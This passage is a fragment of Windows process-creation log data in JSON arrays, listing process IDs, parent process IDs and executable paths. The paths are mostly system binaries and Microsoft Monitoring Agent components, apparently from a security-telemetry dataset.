",\"0xf58\",\"0x67c\",\"0xefc\",\"0x13d8\",\"0x19e8\",\"0x7fc\",\"0x107c\",\"0x1ef4\",\"0x19f4\",\"0x2020\",\"0x918\",\"0xf20\",\"0x1008\",\"0x23ec\",\"0x2274\",\"0x1f88\",\"0x239c\",\"0x1770\",\"0xfc0\",\"0x7f8\",\"0x1860\",\"0x1dec\",\"0xb00\",\"0xeb0\",\"0x158c\",\"0x794\",\"0x458\",\"0x1b00\",\"0xb28\",\"0x634\",\"0x16a8\",\"0x1e68\",\"0xa98\",\"0x14c8\",\"0x6c0\",\"0x22c0\",\"0x2280\",\"0xccc\",\"0x67c\",\"0x878\",\"0x13d8\",\"0x1458\",\"0xa24\",\"0x1cd8\",\"0x1420\",\"0x8f8\",\"0xc5c\",\"0x1f88\",\"0x1cd8\",\"0x19d8\",\"0x1e3c\",\"0x1a9c\",\"0x1770\",\"0x1260\",\"0x55c\",\"0x115c\",\"0x2068\",\"0x11dc\",\"0x13e4\",\"0x1524\",\"0x17b0\",\"0x8c4\",\"0x2228\",\"0x1cf0\",\"0x1860\",\"0x1874\",\"0xa90\",\"0x11a8\",\"0x173c\",\"0x1910\",\"0x1db4\",\"0x438\",\"0x2018\",\"0x21c8\",\"0x2044\",\"0x2200\",\"0x1124\",\"0xd44\",\"0x1c24\",\"0x1198\",\"0x135c\",\"0xd04\",\"0x2364\",\"0x1110\",\"0x994\",\"0x2328\",\"0x6d4\",\"0x20e4\",\"0x1998\",\"0xf54\",\"0x5a8\",\"0x1db8\",\"0x1fa4\",\"0x604\",\"0x1f24\",\"0x518\",\"0x2170\",\"0x12a8\",\"0x200c\",\"0xf80\",\"0x1860\",\"0x1874\",\"0xccc\",\"0xd7c\",\"0x1634\",\"0x1748\",\"0x1898\",\"0x1eb4\",\"0x1468\",\"0x2200\",\"0x1e8c\",\"0x2348\",\"0x11f0\",\"0x1f20\",\"0x1480\",\"0x220\",\"0x980\",\"0x1704\",\"0x1520\",\"0x16cc\",\"0xfd4\",\"0x53c\",\"0xbbc\",\"0x23e8\",\"0xdf8\",\"0x1c50\",\"0x394\",\"0x105c\",\"0xd44\",\"0x994\",\"0x17e0\",\"0xa58\",\"0x1564\",\"0x1328\",\"0x1e3c\",\"0x1fa8\",\"0x12d4\",\"0x1f38\",\"0x239c\",\"0x2320\",\"0x1f3c\",\"0x11f0\",\"0x864\",\"0x8dc\",\"0x183c\",\"0xd74\",\"0x21c8\",\"0x6f8\",\"0x1c24\",\"0x1fc0\",\"0x17a4\",\"0x10bc\",\"0x1c10\",\"0xb48\",\"0x235c\",\"0xbd0\",\"0x1468\",\"0x15c8\",\"0x1278\",\"0xe34\",\"0xbc\",\"0x53c\",\"0x1834\",\"0xef4\",\"0x15f4\",\"0xcd8\",\"0xfd4\",\"0x181c\",\"0xbc\",\"0x1b28\",\"0x1d6c\",\"0x15f4\",\"0xda8\",\"0x16e0\",\"0xbb4\",\"0x11f4\",\"0x12d0\",\"0xce0\",\"0x1994\",\"0x123c\",\"0x20b0\",\"0xccc\",\"0x14ec\",\"0xda8\",\"0x1cfc\",\"0x7fc\",\"0x108c\",\"0x798\",\"0x22e0\",\"0x172c\",\"0x1dec\",\"0xe2c\",\"0x1080\",\"0xb14\",\"0x17ec\",\"0x1898\",\"0x1058\",\"0xe1c\",\"0x834\",\"0x17c4\",\"0x88c\",\"0x2e4\",\"0x108c\",\"0x1360\",\"0x19f4\",\"0x19f0\",\"0x1570\",\"0x17a8\",\"0x1058\",\"0x82c\",\"0xd44\",\"0x1bfc\",\"0x1998\",\"0x1c10\",\"0x1184\",\"0xc6c\",\"0x454\",\"0x65c\",\"0xe1c\",\"0x1070\",\"0x1ce8\",\"0xb10\",\"0x2260\",\"0x1c54\",\"0x181c\",\"0x8c0\",\"0x1f60\",\"0x123c\",\"0x518\",\"0xc98\",\"0x1cdc\",\"0x1484\",\"0xb14\",\"0x16bc\",\"0x1bb4\",\"0x1be4\",\"0xec4\",\"0xd68\",\"0xb64\",\"0x1eb4\",\"0xc98\",\"0x6f8\",\"0x84c\",\"0x1d6c\",\"0x490\",\"0x16d4\",\"0xa2c\",\"0x65c\",\"0x12fc\",\"0xd78\",\"0x221c\",\"0x1238\",\"0x1584\",\"0x7c8\",\"0x1420\",\"0x20e4\",\"0x9ac\",\"0x1078\",\"0x1ea8\",\"0x1a44\",\"0x15b8\",\"0x1da8\",\"0x99c\",\"0x974\",\"0x2280\",\"0x205c\",\"0x1360\",\"0x11d4\",\"0xaec\",\"0x1cc4\",\"0x220c\",\"0xc14\",\"0x1f24\",\"0x1b74\",\"0x1620\"],\"NewProcessId_par\":[\"NaN\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0xe24\",\"0x8f0\",\"0xe24\",\"0x1158\",\"0x1158\",\"0xe24\",\"0x20b4\",\"0xe24\",\"0x22c0\",\"0xe24\",\"0x1af0\",\"0x1af0\",\"0xe24\",\"0x644\",\"0xe24\",\"0x1290\",\"0xe24\",\"0x2274\",\"0xe24\",\"0x91c\",\"0xe24\",\"0xf10\",\"0xe24\",\"0x1a00\",\"0xe24\",\"0xe10\",\"0xe10\",\"0xe10\",\"0xe24\",\"0x12f8\",\"0xe24\",\"0xbd8\",\"0xe24\",\"0xf60\",\"0xe24\",\"0x8c4\",\"0xe24\",\"0xb10\",\"0xe24\",\"0x17e0\",\"0xe24\",\"0x15b8\",\"0xe24\",\"0xec0\",\"0xe24\",\"0xdd0\",\"0xe24\",\"0x22dc\",\"0xe24\",\"0x838\",\"0xe24\",\"0xe2c\",\"0xe24\",\"0x16e0\",\"0xe24\",\"0x1c84\",\"0xe24\",\"0x1b64\",\"0xe24\",\"0x690\",\"0xe24\",\"0x1c20\",\"0xe24\",\"0x1280\",\"0xe24\",\"0x650\",\"0xe24\",\"0x1584\",\"0xe24\",\"0x490\",\"0xe24\",\"0xfc0\",\"0xe24\",\"0xa14\",\"0xe24\",\"0x1ce4\",\"0xe24\",\"0xcc8\",\"0xe24\",\"0x8f8\",\"0xe24\",\"0x1614\",\"0xe24\",\"0x1850\",\"0xe24\",\"0x1610\",\"0xe24\",\"0x1080\",\"0xe24\",\"0x1248\",\"0xe24\",\"0x1044\",\"0xe24\",\"0xf08\",\"0xe24\",\"0xa78\",\"0xe24\",\"0xd74\",\"0xe24\",\"0x23d8\",\"0xe24\",\"0x3f8\",\"0xe24\",\"0x23b8\",\"0xe24\",\"0x1548\",\"0xe24\",\"0x10a8\",\"0xe24\",\"0x5a8\",\"0xe24\",\"0xf88\",\"0xe24\",\"0x18b8\",\"0xe24\",\"0x16e8\",\"0xe24\",\"0x1d04\",\"0xe24\",\"0xda8\",\"0xe24\",\"0x1f20\",\"0xe24\",\"0xe3c\",\"0xe24\",\"0x1fa4\",\"0xe24\",\"0x220c\",\"0xe24\",\"0x650\",\"0xe24\",\"0x1570\",\"0xe24\",\"0xf60\",\"0xe24\",\"0x154c\",\"0xe24\",\"0xc60\",\"0xe24\",\"0x638\",\"0xe24\",\"0x15fc\",\"0xe24\",\"0x1d38\",\"0xe24\",\"0x17b0\",\"0xe24\",\"0x17d0\",\"0xe24\",\"0x1fd0\",\"0xe24\",\"0x2120\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"NaN\",\"0x798\",\"0x14ec\",\"NaN\",\"0xb3c\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xd74\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x2368\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x2080\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1be0\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1928\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xb3c\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0xb3c\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xd60\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x53c\",\"0xb3c\",\"0xb3c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x16e8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x21b0\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x1f7c\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0xb3c\",\"0x1454\",\"0x1454\",\"0x1844\",\"0xb3c\",\"0xb3c\",\"0x1ef4\",\"0xb3c\",\"0x1d3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x594\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x23d8\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x634\",\"0xb3c\",\"0xb3c\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x12e0\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1f60\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xfc8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xadc\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xeb0\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x107c\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xc5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0xd44\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"NaN\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"NaN\",\"0x864\",\"0x8dc\",\"0x864\",\"0xd74\",\"0x864\",\"0x6f8\",\"0x864\",\"0x1fc0\",\"0x864\",\"0x10bc\",\"0x864\",\"0xb48\",\"0x864\",\"0xbd0\",\"0x864\",\"0x15c8\",\"0x864\",\"0xe34\",\"0x864\",\"0x53c\",\"0x864\",\"0xef4\",\"0x864\",\"0xcd8\",\"NaN\",\"0x181c\",\"0xbc\",\"NaN\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"NaN\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xccc\",\"0x1994\",\"0xda8\",\"0x1994\",\"0x7fc\",\"0x7fc\",\"0x798\",\"0x1994\",\"0x172c\",\"0x172c\",\"0xe2c\",\"0x1994\",\"0xb14\",\"0xb14\",\"0x1898\",\"0x1994\",\"0xe1c\",\"0xe1c\",\"0x17c4\",\"0x1994\",\"0x2e4\",\"0x2e4\",\"0x1360\",\"0x1994\",\"0x19f0\",\"0x19f0\",\"0x17a8\",\"0x1994\",\"0x82c\",\"0x1994\",\"0x1bfc\",\"0x1bfc\",\"0x1c10\",\"0x1994\",\"0xc6c\",\"0xc6c\",\"0x65c\",\"0x1994\",\"0x1070\",\"0x1070\",\"0xb10\",\"0x1994\",\"0x1c54\",\"0x1c54\",\"0x8c0\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xc98\",\"0x1994\",\"0x1484\",\"0x1484\",\"0x16bc\",\"0x1994\",\"0x1be4\",\"0x1994\",\"0xd68\",\"0xd68\",\"0x1eb4\",\"0x1994\",\"0x6f8\",\"0x6f8\",\"0x1d6c\",\"0x1994\",\"0x16d4\",\"0x16d4\",\"0x65c\",\"0x1994\",\"0xd78\",\"0xd78\",\"0x1238\",\"NaN\",\"0x7c8\",\"0x1420\",\"0x1420\",\"0x9ac\",\"0x1078\",\"0x7c8\",\"0x1a44\",\"0x1a44\",\"0x7c8\",\"0x99c\",\"0x7c8\",\"0x7c8\",\"0x205c\",\"0x205c\",\"NaN\",\"0xaec\",\"0xaec\",\"0xaec\",\"0xc14\",\"0x1f24\",\"0xaec\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cvtres.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\SecEdit.exe\",\"C:\\\\Windows\\\\System32\\\\SecEdit.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 